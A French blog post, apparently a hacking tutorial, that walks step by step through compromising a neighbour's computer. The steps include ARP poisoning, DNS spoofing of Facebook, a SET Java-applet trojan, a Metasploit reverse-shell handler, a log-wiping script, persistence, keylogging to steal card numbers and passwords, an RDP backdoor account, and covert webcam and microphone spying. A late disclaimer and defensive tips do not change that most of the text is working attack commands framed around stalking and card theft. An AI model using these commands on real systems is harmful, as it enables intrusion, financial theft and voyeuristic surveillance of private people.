L’atteinte à la vie privée comme un nul(l), seconde partie

Vous venez de pourrir la vie de votre belle voisine en suivant mon précédent tutoriel et vous n’êtes pas encore en prison ?

Jouez donc au loto !

Faute d’argent pour vous payer une grille de loto, vous pouvez récupérer encore plus d’informations chez votre si belle voisine (numéro de carte bleue, identifiants sur des sites de vente en ligne, et bien d’autres choses ! )

On arrive ici du côté franchement « badass » du hacking : pénétrer directement l’ordinateur de votre voisine pour y implanter keylogger, cheval de Troie, bref tout ce que vous voulez !

Prérequis

  • Avoir un accès au réseau de votre si belle voisine, Petrushka (on peut être belle et avoir un nom pourri), en lui ayant par exemple piraté sa clef WEP.
  • Avoir quelques logiciels installés :
    • Ettercap-NG
    • dnsspoof
    • S.E.T. (Social Engineering Toolkit, normalement il est déjà sur votre backtrack)
    • metasploit

Préparer le piège

Sur quel site votre voisine va-t-elle le plus souvent ?

Facebook bien entendu !

Nous nous ferons donc passer pour Facebook afin d’exécuter une vilaine application pas gentille sur l’ordinateur de Petrushka.

Préparation à l’effacement des traces

Vu que nous ne voulons pas aller en prison, mais juste acheter une grille pour jouer au loto en utilisant la carte bleue de la voisine, nous devons être prêt à effacer les traces de nos méfaits.

Créons le fichier /pentest/exploits/framework3/scripts/meterpreter/clearlogs.rb contenant :

# Clears Windows Event Logs
evtlogs = [
        'security',
        'system',
        'application',
        'directory service',
        'dns server',
        'file replication service'
        ]
print_line("Clearing Event Logs, this will leave an event 517")
evtlogs.each do |evl|
        print_status("Clearing the #{evl} Event Log")
        log = client.sys.eventlog.open(evl)
        log.clear
end
print_line("All Clear! You are a Ninja!")

Maintenant, dans meterpreter, il nous suffira d’exécuter la ligne suivante pour effacer nos traces dans les journaux d’évènements Windows :

meterpreter > run clearlog

Démarrer notre serveur Facebook

Afin de ne pas être détecté par les antivirus, nous aurons besoin du cheval de Troie (Meterpreter par exemple) que nous avons modifié dans l’article précédent.

cd /pentest/exploits/set/
./set
>1 (Social-Engineering Attacks)
>2 (Website Attack Vectors)
>1 (The Java Applet Attack Method)
>2 (Site Cloner)
>no (Pas de port forwarding)
>192.168.0.106 (Notre IP)
>http://www.facebook.com (Le site à cloner)
>15 (Import your own executable)
>[Chemin vers votre cheval de troie]

Bon, c’est vrai qu’il fallait être barbu pour ce coup-ci, vous pouvez avoir l’interface plus en détails ici : https://www.offensive-security.com/metasploit-unleashed/Java_Applet_Attack

Maintenant, attendons que notre cheval de Troie soit lancé, ouvrons metasploit puis entrons quelques commandes simples :

# msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.106
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit

Rediriger le trafic réseau sur notre ordinateur pour nous placer entre la cible et Internet

Un petit coup d’ARP poisoning et c’est réglé ! (évitez de faire ça dans un réseau d’entreprise, les détecteurs d’intrusions vont vous choper…) Attention de ne pas utiliser ettercap à partir d’une machine virtuelle car vous risquez de déconnecter totalement votre voisine d’Internet. Je ne sais pas d’où ça vient, il semblerait qu’ettercap supporte mal les machines virtuelles…

ettercap -T -q -i wlan0 -M arp /192.168.0.1/ /192.168.0.254/ -P autoadd

« -T » signale qu’on ne veut pas d’interface graphique, qu’on est barbu et qu’on travaille en mode console (Texte)

« -q » pour demander à ettercap de bien vouloir ne pas afficher le contenu de tous les paquets TCP et donc de garder la console lisible (On est barbu, mais pas dans Matrix quand même…)

« -i wlan0 » nous permet de spécifier sur quelle interface réseau nous enverrons nos paquets

« -M arp  » veut dire qu’on fera de l’ARP poisoning pour effectuer une attaque « Man In The Middle » (MITM)

« /192.168.0.1/ /192.168.0.254/ » signifie qu’on veut faire croire à 192.168.0.1 qu’on est 192.168.0.254 et inversement.

« -P autoadd » signale à ettercap de continuer à scruter le réseau pour ajouter garder à jour son attaque si 192.168.0.1 ou 192.168.0.254 se connecte ou se déconnecte du réseau. La cible connaîtra une forte baisse de vitesse de connexion, pensez donc bien à désactiver ettercap une fois que vous avez pu vous connecter chez votre voisine !

 

Nous faire passer pour Facebook aux yeux de la cible

Pour cela, on utilise dnsspoof. Il faut créer un fichier de configuration « dnsspoof.conf » contenant les lignes suivantes :

192.168.0.106 facebook.com
192.168.0.106 www. facebook.com        #J'ai dû ajouter un espace après "www.", wordpress en faisait un lien...

« 192.168.0.106 » est notre adresse IP.

Démarrons le spoof DNS.

dnsspoof -i wlan0 -f dnsspoof.conf

« -i wlan0 » signifie qu’on écoute sur l’interface réseau wlan0.

« -f dnsspoof.conf » renseigne à dnsspoof le fichier de configuration à utiliser.

Il ne reste plus qu’à attendre que Petrushka se connecte à facebook…

La voisine se connecte !

Ce qu’elle voit

Ce qu’on voit dans la msfconsole

Connexion et consolidation

On peut maintenant stopper ettercap, qui fait tout de même beaucoup de mal au réseau…

Passons à la suite.

Première chose à faire, obtenir plus de droits sur le système pour faire ce que l’on veut.

meterpreter > getsystem

Ensuite, pour nous cacher un peu plus dans le système, cherchons le processus « explorer.exe », qui est le processus principal de Windows (sans lui Windows s’arrête).

meterpreter > ps

On obtient une liste de processus.

Migrons vers explorer.exe.

meterpreter > migrate 5064

« 5064 » est le numéro de processus de explorer.exe

Nous voilà caché, mais que se passerait-il si Petrushka arrêtait son ordinateur ? Tout serait à refaire… Enregistrons donc notre programme pour qu’il s’exécute au démarrage de Windows et qu’il tente de se connecter à nous toutes les 5 secondes.

Attention, cette méthode est détectée par Avast, il est nécessaire de modifier Metasploit pour passer inaperçu, je n’expliquerai pas la méthode ici.

meterpreter > run persistence -X -i 5 -p 443 -r 192.168.0.106

« -X » signale que notre programme doit s’exécuter au démarrage de Windows. Si « getsystem » n’a pas fonctionné plus haut, vous pouvez utiliser « -U » pour le lancer à la connexion de l’utilisateur.

« -i 5 » pour tenter de se connecter à vous toutes les 5 secondes.

« -p 443 » pour se connecter à vous sur le port 443.

« -r 192.168.0.106 » pour se connecter à vous 🙂

La ligne « Resource file for cleanup » est intéressante car elle permet de supprimer notre programme malveillant de l’ordinateur de Petrushka une fois qu’on a terminé notre méfait pour ne pas se faire avoir. Sauvegardons-la dans un fichier texte.

Récupérer ce qui est tapé au clavier

Rien de plus simple !

meterpreter > keyscan_start

Cette ligne démarrera l’écoute du clavier.

Maintenant il est très facile de récupérer ce qui est tapé :

meterpreter > keyscan_dump

C’en est presque magique !

On peut ainsi récupérer :

  • Coordonnées bancaires
  • Nom d’utilisateur / mots de passe
  • Nom des sites visités
  • Conversations sur les chats
  • E-Mails

Bref, tout ce qui est tapé sur le clavier !

Oui mais ça m’suffit pas !

Capture d’écran

Vous pouvez voir ce que Petrushka voit à l’aide de meterpreter :

meterpreter > use espia
meterpreter > screengrab

Et hop ! c’est magique ! Une capture de l’écran de Petrushka !

Connexion à distance Windows

Windows contient un outil de prise en main à distance pour vous faire pirater dépanner, il suffit de dire à meterpreter de l’activer !

meterpreter > run getgui -u hacker -p s3cr3t

« -u hacker » spécifie le nom de votre utilisateur pour la prise en main à distance.

« -p s3cr3t » son mot de passe.

Il ne nous reste plus qu’à nous connecter !

rdesktop -u hacker -p s3cr3t 192.168.0.1

« -u hacker » spécifie notre mot de passe.

« -p s3cr3t » donne notre mot de passe.

« 192.168.0.1 » est l’adresse IP de la cible.

Encore une fois, Meterpreter nous indique un script à exécuter pour supprimer nos traces sur la machine de Petrushka. Si on souhaite pouvoir effacer nos traces un jour, il vaut mieux noter l’emplacement de ce script dans un fichier texte.

La webcam…

Vous savez ce petit capteur au-dessus de l’écran de votre ordinateur portable que vous ne pouvez pas bouger et que vous oubliez trop souvent de masquer ? Oui, la webcam !

Et si nous épiions notre belle voisine à son insu ? (En petite tenue cela va de soi ! )

meterpreter > webcam_list

Et voici sur un plateau la liste des webcam de la voisine ! Capturons une image…

meterpreter > webcam_snap

Et hop !

C’est magique me direz-vous ? Non, c’est informatique !

Quelques options en plus ici.

… et le micro.

L’image ne suffit pas ? Il vous faut aussi du son ? Pas de problème !

meterpreter > record_mic -d 10

Et voici 10 secondes du son capturé par le micro de la voisine !

Quelques options en plus ici.

Mais si je veux regarder la webcam en continu ?

Je réponds voui !

meterpreter > run webcam -p /var/www -d 500

« -p /var/www » est le dossier où enregistrer les fichiers « webcam.htm » et « webcam.jpg » utilisés durant l’espionnage.

« -d 500 » spécifie la fréquence de mise à jour de l’image en millisecondes.

Il suffit de nous connecter à l’aide de notre navigateur WEB préféré à l’adresse « /var/www/webcam.htm » pour observer la webcam de Petrushka (mise à jour toutes les 500 millisecondes )

Quelques options en plus ici.

Et pour le son ?

Oui mais non, presque ! (haha !) Vous pouvez juste écouter avec 30 secondes de différé à l’aide de « sound_recorder » :

meterpreter > run sound_recorder -i 10

« -i 10 » indique qu’on souhaite enregistrer 10 tronçons de 30 secondes (soit 5 minutes pour les non-matheux)

Meterpreter enregistrera 5 minutes de sons découpés en 10 fichiers de 30 secondes chacun, que vous pourrez alors lire au fur et à mesure qu’ils seront créés. De manière optimale, vous n’aurez donc qu’un différé de 30 secondes sur le son.

Quelques options en plus ici.

Quelques liens

Pour faire ce tutoriel assez poussé, j’ai dû me renseigner sur Internet et lire des documentations et tutoriaux. Vous pourrez y trouver plus de précisions. 😉

Conclusion

Maintenant vous pouvez aller et venir dans Petrushka l’ordinateur de Petrushka et l’espionner en temps réel à son insu, enregistrer tout ce qu’elle tape, et l’observer derrière sa webcam !

Je ne le rappellerai jamais assez, Petrushka est fictive. Si vous utilisez ces méthodes contre votre voisine/chef/cousine/(future ex) copine, vous risquez la prison et/ou une très belle amende !

Tout a été testé sur un ordinateur cible sur lequel Avast Anti-virus n’a détecté que la tentative de persistance de meterpreter. Tout ceci n’est donc ici qu’à titre éducatif pour que vous pensiez à :

  • masquer votre webcam
  • ne pas accepter de lancer n’importe quoi sur Internet
  • désactiver le service de contrôle à distance intégré à Windows, très peu de gens l’utilisent à des fins personnelles …
  • étouffer votre micro (bon, ça, même moi je ne le fais pas)
  • vérifier régulièrement ce qui démarre avec Windows grâce à des logiciels tels que SpyBot S&D ou msconfig pour les plus aguerris
  • installer un pare-feu (et ne pas accepter les yeux fermés les connexions)
  • ne pas trop vous reposer sur votre antivirus
  • vérifier régulièrement les ordinateurs connectés à votre réseau en utilisant des outils tels que superscan sous Windows
  • installez un IDS (Intrusion Detection System) pour les plus paranoïaques (ou consultez un psy)

Pour les hackers en herbe, ne tentez même pas l’ARP poisoning sur un réseau d’entreprise, car tous les voyants de leur IDS se mettraient d’un coup au rouge et vous seriez repérés en un rien de temps ! Il existe des méthodes plus silencieuses pour effectuer des attaques de type Man In The Middle, sur lesquelles je reviendrai sans doute dans un prochain article.

Publicités
À propos

Un informaticien, qui tente de faire comprendre au public que l'informatique n'est pas si compliquée, malgré des acronymes et autres termes obscurs pour faire croire que c'est difficile (et que c'est de votre faute si "ça ne marche pas")

Tagged with: , , , , , , , , , , , , ,
Publié dans Informatique, Intrusion, Piratage, Sans fil
2 comments on “L’atteinte à la vie privée comme un nul(l), seconde partie
  1. quentoli dit :

    Salut,
    J’ai un petit probleme avec le tuto.
    En gros, tout se passe bien jusqu’a l’apparition du pop-up java sur l’ordi de Mme Michu (le mien en fait…)
    Je clique sur executer, mais rien ne ce passe.
    Ce tuto n’est pas si vieux que ça, mais les failles utilisées ont elle étées corrigées depuis?

    • mystcaster dit :

      Bonjour,

      En fait, ce tutoriel n’utilise pas de « faille » mais plus de l’ingénierie sociale : la faille est l’utilisateur lorsqu’il clique sur « exécuter ».
      Si rien ne se passe, c’est peut être ton antivirus, ton pare-feu ou un système de prévention d’intrusion sur ton réseau qui bloque le processus lors de la connexion à l’ordinateur attaquant.

      Si, dans msfconsole, tu vois apparaître « Envoi du stage 1 » (ou quelque chose comme ça) et que ça se bloque après c’est qu’un système de prévention d’intrusion a détecté meterpreter, tu peux alors essayer d’utiliser la version reverse_https de l’outil.

      Si ça n’affiche même pas « Envoi du stage 1 », c’est que ton antivirus a détecté l’applet Java ou que ton pare-feu a refusé la connexion vers ta machine attaquante. Dans ce cas, je te conseille de jeter un œil sur ma série d’articles dédiés au contournement d’un antivirus : https://piratercommeunnul.wordpress.com/2012/09/18/rendre-meterpreter-invisible-en-modifiant-metasploit-comme-un-null-partie-1/

      Si tu n’as aucun antivirus/pare-feu/IPS, il se peut que tu aies un souci de connectivité sur ton réseau, dû à l’ARP poisonning qui ne semble pas fonctionner s’il est effectué à partir d’une machine virtuelle : essaye de « pinguer » la machine attaquante à partir de la machine cible.

Laisser un commentaire

Entrez vos coordonnées ci-dessous ou cliquez sur une icône pour vous connecter:

Logo WordPress.com

Vous commentez à l'aide de votre compte WordPress.com. Déconnexion / Changer )

Image Twitter

Vous commentez à l'aide de votre compte Twitter. Déconnexion / Changer )

Photo Facebook

Vous commentez à l'aide de votre compte Facebook. Déconnexion / Changer )

Photo Google+

Vous commentez à l'aide de votre compte Google+. Déconnexion / Changer )

Connexion à %s

MystCaster
septembre 2012
L M M J V S D
« Août   Oct »
 12
3456789
10111213141516
17181920212223
24252627282930
Catégories
Archives
%d blogueurs aiment cette page :